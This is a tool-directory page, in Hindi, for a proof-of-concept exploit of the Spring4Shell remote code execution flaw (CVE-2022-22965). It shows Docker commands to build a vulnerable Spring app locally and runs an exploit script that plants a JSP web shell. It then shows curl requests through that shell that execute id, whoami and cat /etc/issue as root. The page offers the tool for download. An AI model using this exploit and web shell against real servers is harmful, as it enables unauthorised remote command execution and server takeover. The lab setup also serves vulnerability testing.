Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2022-22965-PoC — CVE-2022-22965 (Spring4Shell) अवधारणा का प्रमाण | Kitploit
उपकरण/GitHubGitHub/sunnyvale-it/cve-2022-22965-poc
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरिमोट एक्सेस टूल
GitHubsunnyvale-it/cve-2022-22965-poc

CVE-2022-22965-PoC

CVE-2022-22965 (Spring4Shell) अवधारणा का प्रमाण

रिपॉजिटरी देखें
7313 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2022-22965 (Spring4Shell) प्रूफ ऑफ कॉन्सेप्ट

स्प्रिंग कोर में RCE (रिमोट कोड एक्ज़ीक्यूशन) का परीक्षण करें

इमेज बनाएं

बिल्डकिट आधारित बिल्ड आवश्यक है, इसलिए आपको इसे सक्षम करना होगा।

सबसे आसान तरीका है डॉकर बिल्ड कमांड का उपयोग करते समय DOCKER_BUILDKIT=1 एनवायरनमेंट वेरिएबल सेट करना, जैसे:

root@kitploit:~
$ DOCKER_BUILDKIT=1 docker build -f Dockerfile.core . -t spring4shell-core && docker run --rm -p 8080:8080 spring4shell-core

अन्यथा, डिफ़ॉल्ट रूप से डॉकर बिल्डकिट सक्षम करने के लिए, /etc/docker/daemon.json में डेमॉन कॉन्फ़िगरेशन फीचर को true पर सेट करें और डेमॉन को पुनरारंभ करें:

root@kitploit:~
{ "features": { "buildkit": true } }

इस तरह आप सीधे निष्पादित कर सकते हैं

root@kitploit:~
$ docker build -f Dockerfile.core . -t spring4shell-core && docker run --rm -p 8080:8080 spring4shell-core

असुरक्षित एप्लिकेशन का परीक्षण करें

root@kitploit:~
$ curl localhost:8080/spring4shell/exploitme
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>Spring4Shell PoC Spring Application</title>
</head>
<body>
    Hello World! Exploit me!
</body>
</html>

एक्सप्लॉइट चलाएं

root@kitploit:~
$ python3 exploit-core.py --url "http://localhost:8080/spring4shell/exploitme" --file shell
[*] Resetting Log Variables.
[*] Response code: 200
[*] Modifying Log Configurations
[*] Response code: 200
[*] Response Code: 200
[*] Resetting Log Variables.
[*] Response code: 200
[+] Exploit completed
[+] Check your target for a shell
[+] File: shell.jsp
[+] Shell should be at: http://localhost:8080/shell.jsp?cmd=id

यदि सब कुछ सही रहा, तो टॉमकैट HTTP पोर्ट के माध्यम से कंटेनर में मनमानी कमांड चलाएं, जैसे:

root@kitploit:~
$ curl http://localhost:8080/shell.jsp\?cmd\=id --output -
uid=0(root) gid=0(root) groups=0(root)

//
root@kitploit:~
$ curl http://localhost:8080/shell.jsp\?cmd\=whoami --output -
root

//
root@kitploit:~
$ curl http://localhost:8080/shell.jsp\?cmd\=cat%20/etc/issue --output -
Debian GNU/Linux 11 \n \l


//
टूल डाउनलोड करें